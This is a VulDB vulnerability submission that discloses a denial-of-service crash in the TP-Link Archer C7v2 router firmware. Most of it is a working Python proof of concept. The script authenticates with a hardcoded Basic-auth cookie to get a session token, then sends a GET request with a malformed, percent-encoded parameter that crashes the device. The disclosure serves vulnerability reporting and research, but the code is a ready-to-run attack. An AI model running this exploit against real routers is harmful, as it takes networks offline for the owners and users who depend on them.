Submit #149356: The new crash vulnerability on TPLINK c7v2 deviceinfo

TitleThe new crash vulnerability on TPLINK c7v2 device
Description# The new crash vulnerability on TPLINK c7v2 device ## Overview of the Vulnerability This vulnerability exists in the router version of TPLINK Archer C7v2(Firmware version:ArcherC7v2_en_us_180114,downloadlink:https://www.tp-link.com/us/support/download/archer-c7/v2/#Firmware). The current vulnerability differs from the previously discovered ones in terms of its attack surface. This vulnerability is mainly caused by mutating request parameters during the GET request, which results in the binary firmware being unable to parse the corresponding string and thus causing a firmware crash. This vulnerability exists in many places where GET request parameters are used, and by crafting malicious data, it can be exploited to crash the target device. ## Business Impact This vulnerability can be easily exploited, potentially resulting in financial losses for affected businesses. In addition, such malicious actions could damage the reputation of the business by undermining customer confidence. In addition, since the vulnerability lies in the process of parsing GET request parameters, the potential attack surface is quite extensive, resulting in a significant impact on a wide range of devices and systems. ## Steps to Reproduce Below is the replicated POC code, which can be used to exploit the vulnerability and crash the program by simply modifying the web IP address of the target device. ## Proof of Concept (POC) When the POC is executed, the web page will not be accessible and the firmware will crash. ```python import requests import re def update_token(): url = 'http://192.168.0.1/userRpm/LoginRpm.htm' headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Referer': 'http://192.168.0.1/', 'Cookie': 'Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D', 'Upgrade-Insecure-Requests': '1', } params = { 'Save': 'Save', } response = requests.get(url, headers=headers, params=params) response_text = response.text pattern = r'http://192\.168\.0\.1/(\w+)/userRpm/Index\.htm' match = re.search(pattern, response_text) token = match.group(1) return token url = 'http://192.168.0.1/XZJSKPAAGEFTGDPA/userRpm/PingIframeRpm.htm' new_str = update_token() pattern = r'(?<=http://192\.168\.0\.1/)\w+(?=/userRpm/PingIframeRpm\.htm)' new_url = re.sub(pattern, new_str, url) headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Referer': 'http://192.168.0.1/XZGTYORAZTUKMSRA/userRpm/DiagnosticRpm.htm', 'Cookie': 'Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D', 'Upgrade-Insecure-Requests': '1', } params = { 'ping_addr': '192.168.0.1', 'doType': 'ping', 'isNew': 'new', 'sendNum': '4', '7%22%0B%802': '64', 'overTime': '800', 'trHops': '20', } response = requests.get(new_url, headers=headers, params=params) try: update_token() except: print('Success') ```
Source⚠️ https://www.tp-link.com/us/support/download/archer-c7/v2/#Firmware
User
 a2ure (UID 41072)
Submission04/27/2023 06:58 (3 years ago)
Moderation05/11/2023 07:29 (14 days later)
StatusAccepted
VulDB entry228775 [TP-Link Archer C7v2 v2_en_us_180114 GET Request Parameter denial of service]
Points20

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!